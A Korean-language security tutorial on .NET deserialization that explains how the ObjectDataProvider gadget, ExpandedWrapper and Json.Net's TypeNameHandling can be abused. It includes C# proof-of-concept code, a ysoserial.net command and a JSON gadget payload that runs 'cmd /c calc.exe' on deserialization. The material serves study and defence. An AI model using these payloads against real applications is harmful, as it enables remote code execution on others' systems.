Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)

Reading time: 5 minutes

이 게시물은 ObjectDataProvider 가젯이 어떻게 악용되는지 이해하는 것과 Json.Net 및 xmlSerializer가 그 가젯과 함께 어떻게 남용될 수 있는지에 전념하고 있습니다.

ObjectDataProvider Gadget

문서에서: ObjectDataProvider 클래스는 바인딩 소스로 사용할 수 있는 객체를 래핑하고 생성합니다.
네, 이상한 설명이니, 이 클래스가 왜 그렇게 흥미로운지 살펴보겠습니다: 이 클래스는 임의의 객체를 래핑하고, _MethodParameters_를 사용하여 임의의 매개변수를 설정한 다음, MethodName을 사용하여 임의의 함수를 호출할 수 있게 해줍니다.
따라서 임의의 객체는 역직렬화되는 동안 매개변수와 함께 함수를 실행하게 됩니다.

이것이 어떻게 가능한가

System.Windows.Data 네임스페이스는 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF에 있는 PresentationFramework.dll 내에서 정의되고 구현됩니다.

dnSpy를 사용하면 우리가 관심 있는 클래스의 코드를 검사할 수 있습니다. 아래 이미지에서 PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name의 코드를 보고 있습니다.

MethodName이 설정되면 base.Refresh()가 호출되는 것을 볼 수 있습니다. 이게 무엇을 하는지 살펴보겠습니다:

좋습니다, 이제 this.BeginQuery()가 무엇을 하는지 계속 살펴보겠습니다. BeginQuery는 ObjectDataProvider에 의해 재정의되며, 이것이 수행하는 작업은 다음과 같습니다:

코드 끝부분에서 this.QueryWorke(null)를 호출하고 있다는 점에 유의하세요. 이것이 무엇을 실행하는지 살펴보겠습니다:

이것은 QueryWorker 함수의 전체 코드는 아니지만, 흥미로운 부분을 보여줍니다: 코드 this.InvokeMethodOnInstance(out ex);를 호출합니다. 이것이 메서드 집합이 호출되는 라인입니다.

단순히 _MethodName_을 설정하는 것만으로도 실행될 것임을 확인하고 싶다면, 이 코드를 실행할 수 있습니다:

using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}

다음과 같이 참조를 추가해야 합니다: C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll 를 추가해야 System.Windows.Data를 로드할 수 있습니다.

ExpandedWrapper

이전의 익스플로잇을 사용하면 객체가 ObjectDataProvider 인스턴스로 역직렬화될 경우가 있습니다 (예: DotNetNuke 취약점에서 XmlSerializer를 사용하여 객체가 GetType을 사용하여 역직렬화됨). 그러면 ObjectDataProvider 인스턴스에 래핑된 객체 유형에 대한 정보가 없습니다 (예: Process). DotNetNuke 취약점에 대한 더 많은 정보는 여기에서 확인할 수 있습니다.

이 클래스는 주어진 인스턴스에 캡슐화된 객체의 객체 유형을 지정할 수 있도록 합니다. 따라서 이 클래스는 소스 객체 (ObjectDataProvider)를 새로운 객체 유형으로 캡슐화하고 우리가 필요한 속성 (ObjectDataProvider.MethodName 및 ObjectDataProvider.MethodParameters)을 제공하는 데 사용할 수 있습니다.
이는 앞서 제시된 경우와 같이 매우 유용합니다. 왜냐하면 우리는 _ObjectDataProvider**를 **ExpandedWrapper _ 인스턴스 안에 래핑할 수 있고 역직렬화될 때 이 클래스는 OjectDataProvider 객체를 생성하여 _MethodName_에 지정된 함수를 실행할 것입니다.

다음 코드를 사용하여 이 래퍼를 확인할 수 있습니다:

using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}

Json.Net

공식 웹 페이지에서는 이 라이브러리가 Json.NET의 강력한 JSON 직렬 변환기를 사용하여 모든 .NET 객체를 직렬화 및 역직렬화할 수 있도록 한다고 명시되어 있습니다. 따라서 ObjectDataProvider 가젯을 역직렬화할 수 있다면, 객체를 역직렬화하는 것만으로도 RCE를 유발할 수 있습니다.

Json.Net 예제

먼저 이 라이브러리를 사용하여 객체를 직렬화/역직렬화하는 방법에 대한 예제를 살펴보겠습니다:

using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}

Json.Net 악용하기

ysoserial.net을 사용하여 익스플로잇을 생성했습니다:

ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

이 코드에서 익스플로잇을 테스트할 수 있습니다, 그냥 실행하면 calc가 실행되는 것을 볼 수 있습니다:

using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}